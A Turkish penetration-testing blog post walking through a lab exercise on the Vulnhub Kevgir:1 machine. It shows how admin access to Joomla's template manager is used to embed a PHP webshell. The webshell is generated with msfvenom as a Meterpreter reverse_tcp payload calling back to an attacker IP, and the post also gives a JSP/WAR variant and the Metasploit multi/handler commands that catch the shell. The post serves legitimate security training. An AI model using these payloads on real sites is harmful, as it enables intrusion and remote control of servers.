Erişim Sağlanan Jooma Yönetim Arayüzünde MsfVenom ile Oluşturulan PHP Kodunun Gömülerek İşletim Sistemine Erişim Sağlanması

0
185
views
Web uygulaması sızma testleri sırasında erişilen web uygulaması üzerinden işletim sisteminde kod çalıştırılabilir. Bu yazıda yönetici hakları ile erişim sağlanan Kevgir:1 sanal makinesindeki Joomla yönetim arayüzü MsfVenom aracı ile hazırlanan bir PHP kodunun (webshell backdoor) hedefe şablon olarak yüklenmesi yolu ile istismar edilecek ve işletim sistemine Meterpreter ile erişim sağlanacaktır.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Yazıda kullanılan Kevgir:1 sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/kevgir-1,137/

 

Joomla uygulamasına yönetici olarak erişim sağlandıktan sonra işletim sisteminde kod çalıştırabilmek için şablon yönetimindeki (“Extensions > Template Manager“) zafiyet istismar edilecektir.

 

Zafiyet istismarı için şablon seçilir.

 

Şablonun HTML kodu düzenlenir.

 

HTML kodu varsayılan olarak aşağıdaki gibidir. Bu kod silinerek yerine yeni bir kod eklenecektir.

 

Hedef sistemin saldırgan bilgisayarına (100.100.200.210) erişim sağlaması için msfvenom ile yeni bir payload hazırlanır.

ifconfig eth0
msfvenom -p php/meterpreter/reverse_tcp LHOST=100.100.200.210 LPORT=11223 -f raw

 

Not: Payload olarak JSP de kullanılabilirdi:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=100.100.200.210 LPORT=11223 -f war > /root/Desktop/kabuk.war

 

Hazırlanan bu kodun turuncu ile belirtilen alanı (başındaki “/*” kısmı alınmaz) kopyalanır ve şablon kodunun bulunduğu alana yapıştırılır. Sonrasında da şablon kaydedilir.

 

Şablonun başarılı bir şekilde kaydedildiği görülür.

 

Sayfa çağırıldığında msfvenom ile hazırlanan kod çalışacak ve ters bağlantı talebi oluşacaktır. Bu bağlantının yakalanması içinm saldırgan bilgisayarında multi/handler modülü başlatılır.

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 100.100.200.210
set LPORT 11223
exploit -j

 

Şablon ön izlemeye alındığında yazılı olan kod parçacığı çalışacaktır.

 

Böylece saldırgan tarafında Meterpreter talebi yakalanmış olacaktır.

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.